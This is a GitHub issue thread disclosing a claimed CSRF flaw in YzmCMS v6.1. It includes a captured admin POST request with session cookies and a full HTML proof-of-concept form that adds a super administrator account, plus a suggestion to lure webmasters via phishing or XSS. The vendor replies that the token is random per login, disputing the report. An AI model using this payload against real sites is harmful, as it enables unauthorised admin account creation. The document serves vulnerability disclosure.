### ISSUE TITLE
Yzmcms has CSRF vulnerability, super administrator can be added

### ISSUE THREAD

**Issue by haungtongfu** [yzmcms/yzmcms#56]
### 1. Overview

(1) Manufacturer: free, open source cms

(2) Official website: https://www.yzmcms.com/

(3) Version: v6.1

(4) Source code: https://www.yzmcms.com/xiazai/

(5) Vulnerability type: CSRF post

(6) Harm: Super administrator account can be added remotely

### 2. Analysis

2.1 logic analysis

In the add administrator page, there is no referer authentication, but there is a token authentication, but the token value is fixed, which means there is no effect. Therefore, you can construct a payload to entice the administrator to click to complete the action of adding a super administrator account
![image](https://user-images.githubusercontent.com/58809869/123439222-170eef00-d604-11eb-9e7e-8e1fd0b29525.png)
2.2 packet analysis
POST /yzmcms/admin/admin_manage/add.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 137
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/yzmcms/admin/admin_manage/add.html
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; v49_sessid_1b453248ace7=2021-6q-g613-vctxdqpyt-ce750908e; v49_lang=cn; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3Dnull%0Afmlogin%3Dnull%0Afmgetpw%3Dnull%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9; v49_clicks=company_2015-7p-hhw1%3D1624418649%0Anews_2021-6r-bqf4%3D1624523406%0Acompany_2017-59-00m1%3D1624437885%0A; yzmphp_adminid=45fe-sw5qKk8ch3K-RH2SDCRuqHa59nRI1mydD1N; yzmphp_adminname=3231fS_fEVSWhKnoR4fr3Lfn4W8FynPZz2BU-Qv4dlJMBg

adminname=test&password=123456&password2=123456&email=11%40qq.com&realname=test&realname=test&roleid=1&dosubmit=1&yzm_csrf_token=btgYjV4y
![image](https://user-images.githubusercontent.com/58809869/123439298-2f7f0980-d604-11eb-903b-fb9caee3a324.png)
![image](https://user-images.githubusercontent.com/58809869/123439306-33129080-d604-11eb-993f-47c24d920a21.png)
### 3. Reappearance

Deploying yzmcms with PHP study
![image](https://user-images.githubusercontent.com/58809869/123439354-40c81600-d604-11eb-9c5b-fdfc7f8462b0.png)
（1） Construct a payload, put it in an HTML file, and name it 123. HTML

<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/yzmcms/admin/admin_manage/add.html" method="POST">
      <input type="hidden" name="adminname" value="test" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="password2" value="123456" />
      <input type="hidden" name="email" value="11&#64;qq&#46;com" />
      <input type="hidden" name="realname" value="qazw" />
      <input type="hidden" name="realname" value="tqazw" />
      <input type="hidden" name="roleid" value="1" />
      <input type="hidden" name="dosubmit" value="1" />
      <input type="hidden" name="yzm&#95;csrf&#95;token" value="cDmV74EV" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
![image](https://user-images.githubusercontent.com/58809869/123439423-53424f80-d604-11eb-9dd8-cdea6f3e34b8.png)
（2） Through a variety of means, including but not limited to XSS, puddle attacks, phishing sites and other means to lure webmasters to click the link, we can construct a payload to complete the attack and add an administrator account
![image](https://user-images.githubusercontent.com/58809869/123439481-62290200-d604-11eb-96c3-5d6abed8110d.png)

![image](https://user-images.githubusercontent.com/58809869/123439501-6523f280-d604-11eb-90b7-a4b40a1a8c1b.png)
### 4. Repair suggestions

The token is used for authentication, but the value of the token must be different every time, and the token value cannot be guessed and generated randomly

**Comment by yzmcms** [comment]
yzmcms后台管理员token每次登录都是随机生成的，并不是固定不变的，所以并不存在以上问题
